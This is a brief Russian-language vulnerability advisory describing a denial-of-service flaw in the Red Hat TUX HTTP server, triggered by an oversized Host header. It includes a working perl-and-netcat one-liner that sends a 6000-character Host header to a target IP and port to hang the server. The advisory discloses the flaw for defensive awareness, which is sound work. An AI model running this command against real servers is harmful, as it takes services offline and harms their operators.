Dos против Red Hat TUX HTTP Server

TUX - свободно распространяемый HTTP сервер. Сервер может обслуживать статическое содержание, кэшировать динамическое содержание, и взаимодействовать с другими HTTP серверами.

Ошибка возникает, когда TUX daemon получает host:header, c завышенными размерами, как часть HTTP запроса. Такой запрос приводит к зависанию сервера и для нормальной работы потребуется перезагрузка.

Пример:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
Уязвимость найдена a.orawe@ntlworld.com